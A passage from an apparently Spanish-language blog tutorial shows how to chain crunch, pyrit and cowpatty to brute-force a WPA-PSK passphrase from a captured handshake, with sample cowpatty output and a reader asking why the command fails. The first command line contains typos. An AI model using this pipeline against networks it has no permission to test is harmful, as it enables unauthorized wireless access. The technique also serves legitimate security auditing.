El comando seria aproximadamente como este:
./crunch 8 8 123456 | pyrit -e "ESSID" -f -passthrourg | cowpatty -d - -r captura.cap - "ESSID"
donde el uso del crunch ya lo dominamos ( o eso espero... ), pyrit selecciona el ESSID para el ataque y busqueda de la contraseña y cowpatty lee el archivo de captura y lo generado por crunch para intentar sacar la clave.
Esto en realidad no tiene mucho misterio pero es algo que nos puede llegar a salvar un poco si lo que queremos es usar los tres programas a la vez, con lo cual nos saldria algo parecido a esto:
./crunch 8 8 123456 | pyrit -e ESSID -f -
passthrough | cowpatty -d - -r captura.cap -s ESSID
cowpatty 4.3 - WPA-PSK dictionary attack.
Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack. Please be patient.
Using STDIN for hashfile contents.
key no. 10000: 11131143
key no. 20000: 11335211
key no. 30000: 11453262
....
key no. 1660000: 66342333
key no. 1670000: 66512215
Unable to identify the PSK from the dictionary file. Try expanding your
passphrase list, and double-check the SSID. Sorry it didn't work out.
1670168 passphrases tested in 171.54 seconds: 9736.04 passphrases/second
No funciona el comando. Por que puede ser?
ResponderEliminarEn passthrough que hay que poner?
Un saludo y gracias